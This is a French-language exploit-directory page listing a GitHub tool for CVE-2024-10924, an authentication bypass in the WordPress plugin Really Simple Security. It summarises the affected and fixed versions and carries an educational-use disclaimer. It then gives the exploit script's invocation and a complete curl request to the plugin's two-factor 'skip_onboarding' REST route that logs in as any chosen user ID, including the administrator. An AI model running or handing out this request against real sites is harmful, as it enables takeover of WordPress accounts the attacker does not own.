Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-10924 | Kitploit
Outils/GitHubGitHub/cy3erdr4g0n/cve-2024-10924
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionAuthentificationApprentissage et Éducation
GitHubcy3erdr4g0n/cve-2024-10924

CVE-2024-10924

Voir le dépôt
il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Exploit pour CVE-2024-10924 (Plugin WordPress Really Simple Security - Contournement de l'authentification)

📌 Aperçu

CVE-2024-10924 est une vulnérabilité critique de contournement de l'authentification dans le plugin Really Simple Security pour WordPress (versions 9.0.0 à 9.1.1.1). Cette vulnérabilité permet à des attaquants non authentifiés de se connecter en tant que n'importe quel utilisateur (y compris l'administrateur) en exploitant une faille dans l'API d'authentification à deux facteurs (2FA).

Identifiant CVE : CVE-2024-10924

Sévérité : 🔥 Critique (CVSS 9.8)

Versions concernées : Really Simple Security 9.0.0 – 9.1.1.1

Version corrigée : 9.1.2

Type d'exploit : Contournement de l'authentification

⚠️ Avertissement

🚨 Cet exploit est uniquement destiné à des fins éducatives et de recherche en sécurité.

Toute utilisation non autorisée sur des systèmes qui ne vous appartiennent pas est illégale. L'objectif est d'aider les professionnels de la sécurité à tester et à corriger les systèmes vulnérables.

🔧 Prérequis

Un site WordPress exécutant une version vulnérable du plugin Really Simple Security. Python 3.x ou cURL installé pour les tests. Le nom d'utilisateur administrateur WordPress cible (l'énumération des utilisateurs peut être nécessaire).

Exécutez le script :

python3 exploit.py <url example : http://target.com> <user_id>

manuellement avec Curl

curl --request POST "http://{url}/?rest_route=/reallysimplessl/v1/two_fa/skip_onboarding" -H "Content-Type: application/json" -d '{"user_id": 1, "login_nonce": "invalid_nonce"}' -v

Télécharger l’outil